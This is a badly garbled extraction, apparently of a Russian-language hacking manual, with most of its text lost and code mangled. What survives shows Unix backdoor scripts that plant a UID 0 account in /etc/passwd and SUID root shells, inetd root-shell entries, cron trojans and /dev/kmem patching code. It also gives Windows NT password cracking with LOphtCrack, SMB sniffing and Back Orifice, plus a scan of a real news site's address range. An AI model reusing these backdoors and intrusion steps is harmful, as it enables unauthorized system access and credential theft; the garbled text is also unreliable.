    , sh, ksh, csh . .bat MS-DOS, . .


    . , ,

    - , .

    number=1 number 1. string=Hi There

    string="Hi There" string Hi

    there.

    - .

    ,

    ($). . ,

    bat-, . , . :

    counter=1
    arg1="-uf"
    arg2="scythian"
    ps $arg1 $arg2
    echo $counter

    ps -uf scythian,

    1. Echo , .

    :

    read - .

    : read . ! - , :

    echo " ?" read hisname echo Hello $hisname ? Sir Hackalot Sir Hackalot : read .


    trap - (Ctrl-c). :

    trap command; command; command; .. :

    trap "echo '!! ' ; echo ! ' , control-c ,

    :

    !! !

    exit : exit []. ,

    , .

    CASE case .

    :

    case in
    1) command; command;;
    2) command; command; command;;
    *) command;;
    esac

    .

    ;;>. :

    echo ":"
    echo "(D)irectory (L)ogoff (S)hell"
    read choice
    case $choice in
    D) echo " ..."; ls -al;;
    L) echo ; kill -1 0;;
    S) exit;;
    *) echo "! ";;
    esac


    esac case.

    .

    8.

    , . : for repeat.

    repeat :

    repeat 12

    . :

    repeat s c y t h i a n sirhack prophet

    scythian, sirhack, prophet.

    for

    for -

    do ()

    done () :

    for counter in 1 2 3
    do
    echo $counter
    done

    1, 2, 3.

    9. TEST

    : Test

    ::

    -eq = () - ( )



    -gt > ()
    -lt < ()
    -ge >= ( )

    -1


    expr 22+12

    22+12 :

    expr 22 + 12 :

    34

    11.

    , ,

    .profile.

    home () .

    PS1 , .

    $. BSD &.

    PATH .

    , , ,

    . MS-DOS, . ,

    ,

    , ,

    , . - ,

    .

    :

    :/bin:/etc:/usr/lbin:$0: , Unix

    /bin, /etc, /usr, /lbin , , .

    , .

    sh sh, , Unix /bin. . -


    , , ,

    .

    TERM .

    CURSES, - , esc-. - ,

    - .

    esc- TERMCAP. , ami vtlOO, CURSES , .

    12.

    . ? , .

    , .

    .

    ..

    ..

    ,

    , ,

    , .

    makefile, make , -

    .

    make , ,

    .

    :

    $ login.& [1234] $ (1234 - , .)


    13.

    Unix. , Unix,

    .

    .

    ,

    , MS-DOS , , AmigaDos. ((d) ):

    / ( ) I

    I I bin (d) usr (d)

    .

    sirhack(d) scythian (d) prophet (d) I

    src (d) , :

    /
    /bin
    /usr
    /usr/sirhack
    /usr/sirhack/src
    /usr/scythian
    /usr/prophet

    , .


    14.

    , - .

    . , ,

    .

    ,

    . .

    ( ) id , .

    .

    , / . , Unix, , UID , .

    . .

    (owner). , , - .

    , , CHOWN, , .

    , - ,

    , . ,

    , chgrp.

    . ,

    . , ,

    , .

    , , ,

    , , - ,

    . ,

    , .

    . , . - -

    .

    , .

    . - . :

    $ ls -l runme
    r-xrwxr- sirhack root 10990 March 21 runme

    root , .

    sirhack - . root , ,

    . , Scythian, root. ,


    . datawiz, .

    , , ? . - . ,

    ,

    , , .

    ,

    r-x-rwxr--

    (-). (-) ,

    .

    r-xRWXr-(, ) ,

    , .

    r-xrwxR-- . ,

    .

    :

    $ ls -l
    drwxr-xr-x sirhack root 342 March 11 src

    d . ,

    (sirhack) , .

    , .,

    ,

    :

    $ chmod go-r
    $ ls
    drwx--x--x sirhack root 342 March 11 src

    -, sirhack,

    .

    Is, src, , , cannot read directory ( ). - , ,

    - .

    - ,

    .


    UNIX

    1. !

    ,

    , ,

    ,

    ,

    ...

    !

    2.

    - UNIX. , ID.

    ID.

    . ? , GANDALF data switch .

    .

    (8N1 71), GANDALF UNIX. . - ,

    , .

    , .

    ,

    , . LOG OFF, . , , , ,

    . SU () , (, , WHO).


    3.

    . UNIX .

    ,

    . (, UNIX ) VI.LOGIN.

    VI.LOGIN : VI.LOGIN logout , VI.LOGIN

    . :

    ,

    .

    :

    ,

    .

    (ROOT - ).

    4.

    . ( )

    , UNIX. -

    . , .

    , ,

    (, 3-4) . ID , , ,

    , - . ,

    UNIX, . ! , ! , -


    . , -

    , , ,

    ? , ,

    ,

    , , .

    , !

    PASSWRDS, (SU) !

    . UNIX , , .

    . .

    . , .

    , , , NIS, NFS, , SUID, Sendmail . . ! ? #? -!

    , ,

    root. ? ,

    ?

    5. root

    , ,

    , .

    : . ( , ,

    UNIX ). passwrd (

    7 , , ..). vi. , UNIX . Vi . -


    (dial-up\telnet\rlogin\whatver), , .

    ,

    .

    .

    , , , ,

    , ,

    - .

    :

    ,

    .

    :

    (1) UID 0 . ,

    , .

    , -

    .

    .

    ...

    #!/bin/csh # Inserts a UID 0 account into the middle of the passwd file. ft There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # [email protected] set l i n e c o u n t = 'wo -1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $ l i n e c o u n t [ 1 ] lines. @ l i n e c o u n t [ 1 ] /= 2 linecount[1] += 1 ft we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] . / temppass ft passwd string optional echo EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" ,/xaa cat ./xab . /xaa mv ./xaa /etc/passwd


    chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa ./temppass echo Done... . , ,

    .

    (2)

    , Sync. , , , , .

    UID 0 ( * ).

    (3) /tmp: #!/bin/sh # Everyone'sfavorite... cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that... chmod 4755 /tmp/.evilnaughtyshell \tmp .

    .

    ,

    SUID. , , ... ,

    .

    , .

    (4)

    ,

    ?

    : Internet- (\etc\ inetd\) TCP UDP .

    \etc\inetd.conf. .

    :

    (1)  (2)    (3) (4)    (5)  (6)             (7)
    ftp  stream tcp nowait root /usr/etc/ftpd   ftpd
    talk dgram  udp wait   root /usr/etc/ntalkd ntalkd

    (1) - , \etc\services. inetd


    \etc\services .

    , . TCP stream (- ), UDP - dgrams (, ). - (TCP UDP). . wait ,

    , , nowait, ,

    . - ( UID), . (6) - , (7) ( ). ( ) . internal (6) (7). , , ,

    , SUID, , \etc\passwd .

    :

    \etc\inted.conf, , , .

    :

    daytime stream top nowait root internal :

    daytime stream tcp nowait /bin/sh sh -i \etc\inetd\

    . , .

    (kill -9, /usr/sbin/inetd /usr/etc/inetd), ( ).

    (5)

    ,

    .

    .

    ,

    \etc\services, \etc\inetd.conf.


    \etc\services : (1) (2)/(3) (4) smtp 25/tcp mail (1) - , (2) - , (3) - ,

    , (4) - . \etc\services: evil 22/tcp evil /etc/inetd.conf: evil stream tcp nowait /bin/sh sh -i inetd. :

    .

    ,

    Internet.

    (6)-I - .

    ,

    , , crontab . ,

    .

    crontab /var/spool/cron/crontabs/root. . ,

    .

    - . ,

    , .

    crontab - , crontab. crontab , /var/spool/crontab/root.

    crontab :

    (1) (2) (3) (4) (5) (6) 0 * * 1 /usr/bin/updatedb

    1 5 : (0-59), (0-23), (1-31), (1-12), (0-6). 6 - ( ). .


    cron /var/spool/crontab/root. , ,

    /etc/passwd U1D 0 ( - crontab, ).

    /var/spool/crontab/root: 0 * * /usr/bin/trojancode :

    f t ! / b i n / c s h ft Is our eviluser still on the system? Let's make sure he is. #[email protected] set evilflag = Cgrep eviluser /etc/passwd') if($#evilflag == 0) then ft Is he there? set linecount = 'wc-1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppasstf Safety first. linecount[1] /= 2 linecount[1] += 1 ft we only want 2 temp files split -$linecount[1] ,/temppass ft passwd string optional echo "EvilUser::0:O:Mr, Sinister: /home/sweet/home:/bin/csh" ./xaa cat ./xab./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd tt or whatever it was beforehand rm ./xa* ,/temppass echo Done... else endif

    (7) - II

    . , () , etc/passwd. ( /var/spool/mail/.sneaky) . , ,

    , 2.30 ( ) \etc\passwd ( !).


    ,

    , ,

    .

    crontab: 29 2 * * * /bin/usr/sneakysneaky_passwd :

    echo ,root:1234567890123:0:0:0perator:/:/bin/csh" > /var/spool/mail/.sneaky :

    #!/bin/csh # Install trojan / e t c / p a s s w d file for one minute [email protected] cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd

    (8) .

    - -, .

    .

    , .

    - .

    SUID-- , . -

    , ,

    .

    /* [email protected] */ ((include Sdefine KEYWORD "indust" define BUFFERSIZE 10 int main(argc, argv) int argc; char.argv[] ;{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYW0RD,argv[1]))){ /* */ systemCcp /bin/csh /bin/. swp12V);


    system("chown root / b i n / . s w p i 2 l " ) ; system*"chmod 4755 /bin/.swp121"); } } /* Put your possibly system specif ic t ro jan messages here */ /* Let's look like we're doing s o m e t h i n g . . . */ printfCSychroniz ing bitmap image records."); /* system*"is -alfl / >& /dev/null > /dev/null&"); */ for* ; i tmpf i le /usr/bin/uuencode tmpfile / root/ , rhosts , 25.

    , uuencode- .rhosts. () :

    %echo "+ +" | /usr/bin/uuencode / r o o t / , rhosts | mail decode@target . com .

    , ,

    .

    .


    (10) ,

    , tripwire.

    :

    . su, login pass-wrd, . ,

    UNIX. (: ,

    , ). , ,

    :

    ,

    , ,

    .

    10- .

    (11) : \dev\khem .

    , , ,

    UID. , , \dev\khem /. : \dev\khem, , U I D , csh, U I D . .

    /* \khem , , ID 0. */ include include include include include include include define KEYWORD "nomenclaturel" struct user userpage; long address(), userlocation;


    int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ i f ( ! (strcmp(KEYW0RD,argv[1]))){ fd=(open("/dev/kmem",0 RDWR); if(fd


    include include define LNULL ((LDFILE *)0) longaddress(){ LDFILE -object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit (50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp(" u",ldgetname(object,&symbol)))

    { fprintf(stdout, "Userpage is at 0x%8.8x\n", symbol.n_value); ldclose(object); return(symbol.n_value);

    ) } fprintf(stderr, "Cannot read symbol table in /unlx.\n"); exit (60); }

    (12) /dev/kmem

    , , , ,

    .

    - (7), (, 5 ) , /dev/kmem, .

    (7): chmod 666 /dev/kmem sleep 300 Nap for 5 minutes chmod 600 /dev/kmem # Or whatever it was before


    6.

    :

    , ,

    . - ,

    single-user ( ) .

    -

    , ,

    ,

    ,

    .

    (, ), . -

    sendmail debug, . ,

    , passwrd, , , ( , , sendmail, Internet Worm, telnet 25 .

    , , , :

    a) ,

    root/daemon/bin, , ,

    .

    b) , ,

    .


    / / ,

    . ,

    . ,

    AT&T System V Unix acctcom(l),

    . TCP/IP / , rwhod, fingerd tftpd, .

    .

    / ; ( /etc, /etc/re, /etc/rcX.d) . .

    chmod(l).

    7. /

    .

    ; .

    -

    ,

    .

    , , ,

    ,

    .

    ,

    . ,

    .


    ; , .

    . , ,

    ,

    .

    ,

    ! - ( ) .

    8. Unix

    :

    :

    1) . 2) src. 3) . 4) . :,

    1) SUID/SGID. 2) / .. 3) . 4) . 5) . 6) . 7) . 8) . 9) . 10) /.


    11) . 12) , . 13) .

    :

    I: Suid-

    ) . ) . ) (

    sym, loc.-). ) . II: , SUID

    ) . ) . ) . ) . ) . III:

    ) . ) . ,

    System Development Corporation 65%- .

    :

    1 .

    ,

    .


    :

    A) : , . : .

    B) : , . : i-node ( ).

    C) : , . : .

    .

    .

    , .

    .

    , ,

    LINUX, NET2 BSD386. , ,

    , ,

    . ,

    () , - ,

    .

    2 (

    ).

    UNIX? ( , ).

    who OS , .

    suid- OS. - suid . : - suid, -


    . ,

    suid, suid, .

    ,

    , -: , suid, sgid, ( suid/sgid), OS .

    . ( ).

    4

    .

    9.

    1) , .

    : gets, (sprintf()?, gets () ..). strcpy (), src:

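    /* Bounded copy into a fixed-size array a; strncpy does not
       NUL-terminate when b is sizeof(a) bytes or longer. */
    #define SCYPYN(a, b) strncpy(a, b, sizeof(a))

    2) SUID/SGID ,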

    PERL. 3) SUID/SGID , PERL

    taintperl.

    4) SUID/SGID , system(), popen(), 1() execvp() .

    5) , .

    6) .


    7) , . (: fork(2),suid(2),setuid() ).

    8) , : ) ; ) ; )

    ;

    ) , passwd, L.sys ..; )

    /;

    ) , .

    9) . , , .

    10) man- -

    -. .

    11) - , .

    ,

    /.

    ,

    OS-. , . , telnet -h ... , login.c:

    if ((getuid()) && hflag) {
        syslog();
        exit();
    }

    12) . 13) , ,

    , ,

    .


    14) , .

    15) , , , .

    16) : ,

    .

    17) - .

    18) : (passwd OK, illegal parameter, segment error ..) , . 17.

    19) . 20) ,

    .

    21) . 22) . 23) ,

    -

    .

    24) , , .

    25) , . ( UID 0, .)

    26) , ... 27) . 28)

    ( ).

    29) , , , ,

    ( ).


    30) .

    , ,

    , ,

    ,

    , .

    31) , fopen(3) umask. (: 1(1).)

    , UID .

    32) Trace - ( truss SVR4). , .

    33) /usr/local. .

    tcpdump, top, nfswatch... suid.

    34) suid , , .

    , ,

    .

    35) , .

    36) . LD PRELOAD, , .

    37) I/O - , . , .

    38) , I/O (pre-load ).

    39) I/O , ,

    .

    40) , . , ,

    /etc/a, ,


    ( , /etc/utmp).

    41) , suid/sgid.

    10.

    , ,

    . vi ( ). vi :

    :set shell = /bin/sh shell, : :sheU

    cd, ftp , cd.

  • Microsoft Windows 2000 127

    Microsoft Windows 2000

    1.

    Windows NT Windows 2000

    Windows NT Windows 2000. Windows

    NT/2000? Windows NT/2000 ( Windows NT, .. Windows 2000 NT) ,

    DOS, Windows ./95/98,

    . : , . , , .

    ,

    Windows NT - - . , Windows NT/2000 , . , ,

    TCP/IP Windows NT,

    (host, nslookup, talk ..). , ,

    Windows NT..

    , ,

    . ,

    ,

    Internets. ,

    Windows NT. 10 30% . .


    ? , - .

    :

    1. ;

    2. ;

    3. . ,

    .

    . ,

    ,

    Internet.

    .

    . , ,

    . ,

    , . ,

    , ,

    , ,

    - ... .

    2.

    ? , ,

    . , ..

    , . ,

    ,

    , .. , ( ), .., , - , , . .

    .

    Windows NT (.. , , ). ( FAT) NTFS


    . - Windows NT - FAT NTFS. FAT.

    -

    ZIP-. , , FAT. . ,

    NTFS. .

    NTFS , . -

    Windows NT. MS-DOS , , NTFS, NTFSDOS.EXE ( - Mark Russinovich, ). Windows NT , , , . , , .

    , , - ,

    , , - .

    , ,

    NTFSDOS.EXE , , . ,

    - , ,

    .

    - (), Windows NT ( Windows 2000). Windows NT, . :

    SeNTry2020 (http://www.softwinter.com); SecurityPlus (http://www.softbytelabs.com); Ciyptext(http://www.tip.net.au/~njpayne). ,

    ,

    , ,

    - -OW (http://www.security.ru), . ,

    , .

    . ,

    , .



    ,

    - , - ,

    - .

    , .

    , ( ) .

    , .

    , ,

    / . SAM, . ,

    .

    WINNT\SYSTEM32\CONFIG\. Windows NT , SAM, WINNT\SYSTEM32\CONFIG\, , , .

    SAM, LOPHTCrack. Rambler.ru AltaVista. .

    ,

    . , , , .

    : . , ,

    , -

    , .

    13-16 , Windows NT 128 . , SAM ,

    . - Windows NT, - LAN Manager. LAN Manager , ,

    , : Windows 3.11 for Workgroups Windows 95/98. , : , LAN Manager , 14- ,

    . , 14- 7- , -


    . ,

    , ,

    LAN Manager.

    LOphtCrack, Pentium 11-450, , , ( ).

    SYSKEY, Service Pack 3. SYSKEY SAM,

    . . - ,

    , LOphtCrack .

    3.

    SAM SAM- ,

    ... , ,

    Windows NT/2000 (registry), %SystemRoot%\SYSTEM32\ CONFIG\SAM - . , ..

    .

    . , -

    ERD (Emergency Repair Disk), %SystemRoot%\ REPAIR\. , Administrator Guest, , . 16- , ( UNICODE) - MD4. Windows NT/2000

    -.

    ,

    Internet .


    4. LOphtCrack

    LOphtCrack , .

    ,

    .

    SAM. - . .

    300 . ,

    ,

    ( 100 . ).

    word-english File () Open Wordlist File ( ).

    A-Z A-Z 0-9 ( ) .

    - .

    , .

    Tools ()


    , , ,

    .

    ,

    File () Open Password File ( ).

    . lOpht-crack.exe ( 10phtcrack95.exe Windows 95/98). ,

    Windows NT 4.0 ( Window 2000), sniffer readsmb.exe, Windows 3.11/95/95 MS-DOS. sniffera ND1S-, .

    Ethernet- CSMA-CD. NDlS- Network () . Protocols () Add (). Have Disk ( ) , LOphtCrack Oemsetup.inf. sniffer readsmb.exe Windows.

    -

    .

    : , SAM sniffera.

    ,

    , Tools () Dump Password from Registry ( ). IP \\Computer_name \\IP-address.


    Windows NT/2000 ,

    .

    , Windows NT/2000 , Administrator , . ,

    ,

    . nporpaMMyregedit.exe HKEY_CURRENT_USER\Software\ LHI\LOphtCrack\AdminGroupName.

    Administrator Windows NT (2000).

    SAM SAM

    , ERD (Emergency Repair Disk). NT %SystemRoot%\SYS-TEM32\CONFIG\. Windows NT/2000, DOS NTFSDOS (http://www.ntinternals.com/ntfs20r), SAM . LOphtCrack Import SAM File ( SAM--), File (), SAM. Windows NT (2000) , SAM, %SystemRoot%\REPAIR\. , ,

    backup ERD, SAM . ERD, *._ :

    EXPAND SAM. SAM

    sam._ LOphtCrack. Service Pack 3 for

    NT 4.0 SYSKEY - , LOphtCrack ( , LOphtCrack 2.5) SAM.


    sniffer'a

    SYSKEY ,

    .

    sniffer, Ethernet-.

    sniffer, LOphtCrack, readsmb.exe, Windows NT 4.0 ( sniffer Windows 95/98).

    sniffer'a : READSMB > PASSWD , ,

    sniffer'oM, passwd.

    sniffer , , .

    passwd LOphtCrack.

    sniffer'a -v: READSMB -V

    -v , readsmb , - .

    ,

    LOphtCrack, word-eng-lish, . Run () Tools ().

    , Tools Options no , ,

    word-english. -

    , . LOphtCrack 5 *.LC .


    LOphtCrack 2.52 450%

    Pentium, Pentium MMX, Pentium Pro Pentium II III. .

    -

    Pentium II/450.

    .

    .

    SMB sniffer'a Windows 95/98.

    PWDUMP2,

    SAM, SYSKEY SP3.

    PWDUMP2 http://www.webspan.net/~tas/pwdump2/

    SYSKEY , , ,

    Administrators. , ,

    .

    Windows NT PWL-.

    Windows 3.11/95/98, ,

    Windows NT . *.PWL , Windows 3.11/95/98. repwl.exe, http://webdon.com /vitas/pwltool.htm.

    PWL-, .. Browse () PWL-,

    Search Password ( ).


    Windows NT. ,

    , ,

    ,

    . ,

    : http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.asp

    .

    , ,

    ,

    , . ,

    -

    , ...

    GetAdmin.exe ( - - ). , Service Pack 4 , . , , - .

    NT , , System Account, , .

    . , , Billy , SP4 . : , .

    5.

    ,

    Windows NT. , ,

    ,

    Windows NT ( ) .

    :

    Named Pipe File System.


    6. Named Pipe File System

    Named Pipe File System , , named pipes. named pipes , , (mail-slots). , ( CreateFile, ReadFile WriteFile), . named pipes , .

    ( ), ( ). Windows NT :

    Win32 CreateNamedPipe.

    ConnectNamedPipe, .

    Wcomputer name\pipe\pipe name CreateFile.

    CloseHandle. DisconnectNa-medPipe.

    ConnectNamedPipe.

    .

    N- , N- CreateNamedPipe ( ).

    ,

    ( ) .


    ReadFile WriteFile.

    WriteFile, , ReadFile.

    Named Pipe File System Windows NT ,

    . , (RPC) Windows NT NPFS.

    Named Pipe File System .

    PipeBomb AdminTrap, Named Pipe File System.

    7. PipeBomb

    PipeBomb

    .

    , ,

    , .

    (thread), .

    ,

    .

    ,

    .

    .

    ,

    Windows NT 4.0. PipeBomb .

    Create () Write (), Windows NT .


    Internet, SMB TCP/IP ( Named Pipe File System SMB).

    S. AdminTrap

    AdminTrap ,

    . AdminTrap Win32 ImpersonateNa-medPipeClient, (access token) , handle . ,

    AdminTrap -- .

    , AdminTrap Imperso-nateNamedPipeClient , , :

    winreg - , ,

    (alerts), ,

    ;

    spoolss - .

    .

    , ,

    ,

    ,

    AdminTrap, Administrators.

    9.

    Back Oriffice 2000 Back Orifice ( - )

    Windows NT Internet. B02K ,


    ,

    .

    Windows 95/98 Windows NT.

    2 ( bo2kgui.exe)

    TCP UDP 31337.

    ( 120 ) IP-.

    . , ,

    :

    ;

    ;

    ;

    ;

    , ;

    ;

    ;

    .

    2 Configuration Wizard ( bo2kcfg.exe). 2 Configuration Wizard 2 (2.) , . , IP-, .

    ,

    IP- TCP UDP. TCP- Internet. UDP- .


    ,

    bo2k.exe , Plugins DLL.

    10. Windows NT Internet

    Windows NT Internet. - , IP-. Web-, , .

    , ,

    Web-. Web- HS 3.0/4.0/5.0, Microsoft Windows NT, : Web- *.htm, *.asp; Winl253, KOI8-R ( ) .

    ,

    . ,

    ind&cMm, . Internet^ Web- : http://www.ida-honews.com/, . ,

    scripts cgi-bin.

    scripts cgi-bin , - . ,

    Web-. - , , scripts cgi-bin. .

    , cgi-bin , Windows NT Perl. ,

    . , cgi-bin MSWin32-x86-object. .


    , MSWin32-x86-object Perl 5.0, Perl 5.00502.exe. PerlIS-Err.log:

    *** 'E:\docs' error message at: 1998/11/24 13:23:57
    Can't open perl script "E:\docs": Permission denied
    . . . 'E:\docs' error message at: 1998/12/25 04:49:16
    Can't open perl script "E:\docs": Permission denied
    . . . 'E:\docs' error message at: 1999/03/26 16:05:43
    Can't open perl script "E:\docs": Permission denied
    . . . 'E:\docs' error message at: 1999/09/08 11:39:54
    Can't open perl script "E:\docs": Permission denied
    . . . 'E:\docs' error message at: 1999/09/08 11:58:34
    Can't open perl script "E:\


    , , ..,

    , .

    , , , .

    Windows:

    7th Sphere PortScanv 1.1 All Around Internet Ogre v0.9b Port Scannerv 1.1

    PortScan Plus SiteScan by Rhino9/Intercore TCP Port Scanner

    UltraScanvl.2. http://208.234..

    248.19:81/hack/genar/archive5.html. Ogre v0.9b (Rhino9). Windows UNIX Internet.

    Ogre Windows NT Internet.

    Ogre

    Windows 95 Windows NT, . Ogre :

    ;

    ,

    ,

    ;

    netbios (Nbtstat);

    ,

    (net view);


    Microsoft Frontpage;

    ;

    Index Server.

    11. Ogre

    IP- http://www.idahonews.com/.

    ping www.idahonews.com:

    Pinging www.idahonews.com [198.60.102.4] with 32 bytes of data:
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.

    IP- DNS, ping

    . , firewall'OM .

    idahonews.com. ,

    , IP Starting IP ( IP-) 198.60.102.1. Ending Octet 254 ( ). Start scan ( ).

    :

    Scanning - 198.60.102.1

    Commencing Port Scan:

    Port 21: Closed
    Port 23: Open
    Port 25: Closed
    Port 53: Closed
    Port 79: Open
    Port 80: Closed
    Port 110: Closed
    Port 111: Closed
    Port 139: Closed
    Port 443: Closed
    Port 1080: Closed
    Port 8181: Closed

    Scanning - 198.60.102.2

    *Inactive IP address*

    Scanning - 198.60.102.3

    *Inactive IP address*

    Scanning - 198.60.102.4

    *Inactive IP address*

    Scanning - 198.60.102.5

    Commencing Port Scan:

    Port 21: Closed
    Port 23: Closed
    Port 25: Open
    Port 53: Open
    Port 79: Open
    Port 80: Closed
    Port 110: Open
    Port 111: Closed
    Port 139: Closed
    Port 443: Closed
    Port 1080: Closed
    Port 8181: Closed

    Scanning - 198.60.102.6

    *Inactive IP address*

    Scanning - 198.60.102.38

    *Inactive IP address*

    Scanning - 198.60.102.39

    Commencing Port Scan:

    Port 21: Closed
    Port 23: Closed
    Port 25: Open
    Port 53: Open
    Port 79: Open
    Port 80: Closed
    Port 110: Open
    Port 111: Closed
    Port 139: Closed
    Port 443: Closed
    Port 1080: Closed
    Port 8181: Closed

    Scanning - 198.60.102.40

    *Inactive IP address*

    Scanning - 198.60.102.54

    *Inactive IP address*

    Scanning - 198.60.102.55

    Commencing Port Scan:

    Port 21: Closed
    Port 23: Closed
    Port 25: Open
    Port 53: Open
    Port 79: Open
    Port 80: Closed
    Port 110: Open
    Port 111: Closed
    Port 139: Closed
    Port 443: Closed
    Port 1080: Closed
    Port 8181: Closed

    Scanning - 198.60.102.56

    *Inactive IP address*

    Scanning - 198.60.102.254

    *Inactive IP address*

    Windows NT

    135-139. , .

    :

    Scanning - 198.60.102.4

    *Inactive IP address*

    , firewall.

    , .

    tracert 198.60.102.1 ( UNIX traceroute):

    Tracing route to cisco.idahonews.com [198.60.102.1] over a maximum of 30 hops:
    11 240 ms 241 ms 240 ms gbr2-p01.wswdc.ip.att.net [12.123.8.241]
    12 261 ms 260 ms 251 ms gbr1-p40.oc-48., ip.att.net [12.122.2.82]
    13 330 ms 301 ms 390 ms gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17]
    14 301 ms 320 ms 311 ms ar2-a3120s4.sffca.ip.att.net [12.127.1.145]
    15 401 ms 350 ms 351 ms 12.126.207.46
    16 381 ms 350 ms 371 ms cisco.idahonews.com [198.60.102.1]
    Trace complete

    , -

    . ,

    198.60.102.1 Firewall Cisco. . , , ,

    . cisco.idahonews.com Ogre : 23 (Telnet), 79.

    tracert 198.60.102.5:

    Tracing route to router.idahonews.com [198.60.102.5] over a maximum of 30 hops:
    12 260 ms 270 ms 261 ms gbr1-p40.oc-48.sl9mo.ip.att.net [12.122.2.82]
    13 321 ms 310 ms 300 ms gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17]
    14 310 ms 321 ms 320 ms ar2-a300s3.sffca.ip.att.net [12.127.5.177]
    15 341 ms 340 ms 371 ms 12.126.207.34
    16 371 ms * * 198.60.104.181
    17 361 ms 361 ms 370 ms router.idahonews.com [198.60.102.5]
    Trace complete

    , 198.60.

    102.5 router ( UNIX-). router.idahonews.com : 25 (SMNP-), 53 (DNS-cep-), (POP-). , , DNS-. ,

    idahonews.com 192.168.0.*.

    198.60.102.6-253 , IP- idahonews.com.

    ,

    . www.idahonews.com .

    , Firewall'oB Cisco Unix- . ,

    Windows NT Firewall'oM 135-139 .

    12. Windows NT

    , , Internet Windows NT, Firewall'oM, 135-139 . , ,

    , firewall, . , ,

    , Windows NT Service Pack. IIS, , , ,


    , ,

    fix'bi, (Binding) Network ().

    , Ogre :

    Scanning - 198.60.102.4

    Commencing Port Scan:
    Port 21: Open

    , FTP, IIS.

    Port 23: Closed
    Port 25: Open

    , SMNP, IIS

    Port 53: Open
    Port 79: Closed
    Port 80: Open

    , HTTP, IIS.

    Port 110: Open
    Port 111: Closed
    Port 139: Open

    , File Sharing.

    Port 443: Closed
    Port 1080: Closed
    Port 8181: Closed
    Surveying Web Server:
    -Checking for Vulnerable URLs:
    Frontpage Extensions: Not Present
    IIS HTML Administration Interface: Present

    , IIS.

    IIS Samples: Present
    Commencing Nbtstat Scan:
    NetBIOS Remote Machine Name Table
    Name Type Status

    Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered

    MAC Address = XX-XX-XX-XX-XX-XX X, Y Z ,

    , firewall'OM.


    YYYYY UNIQUE - - YYYYY UNIQUE ZZZZZZZZZ GROUP ZZZZZZZZZ GROUP ZZZZZZZZZ UNIQUE ZZZZZZZZZ GROUP YYYYY UNIQUE .ZZZZZZZZZ UNIQUE I N e f S e r v i c e s GROUP ,.__MSBR0WSE__. GROUP

    IS~YYYYY UNIQUE , NetBIOS ,

    nbtstat -.... NetBIOS .

    UNIQUE , IP-;

    4 GROUP , IP-.

    , ,

    ,

    Windows NT.

    ,

    FTP.

    , ,

    Windows NT (Guest, Administrator), . ,

    IIS (Internet Information Service), IUSR_


    NAT

    NetBIOS Auditing Tool, UNIX, Win32.

    Nat - , NetBIOS.. .

    :

    NAT [-0 ] [-U ] [- ]

    . , ,

    Ogre. LOphtCrack, Passlist.txt. , Ogre. nat:

    NAT - REZALT.TXT 198.60.102.4

    NAT , .

    ,

    ,

    .

    , NAT 30 50 .

    Windows NT 100% . , , , . NAT Administrator,

    .

    , NAT , Administrator, ,

    . , ,

    NET USE, 8._ WINNT/REPAIR LOphtCrack, .


    , NET USE ( FTP), , ,

    (Getadmin ..). Windows NT InetPub/cgi-bin. , , , :

    http://www.idahonews/scripts/getadmin.exe?mmmm mmmm ,

    .

    PWDUMP.EXE ( ) Back Orifice NetBus (http://indigo.ie/ ~lmf/nb.htm), .


    1.

    , -

    , .

    :

    . - .

    , UNIX login root . .

    (, login&password).

    (sniffing), (-).. - ,

    .

    : WWW- WWW- - JAVA, ActiveX.

    WWW- / .

    ,

    .

    ; ,


    , ,

    , , - .. ,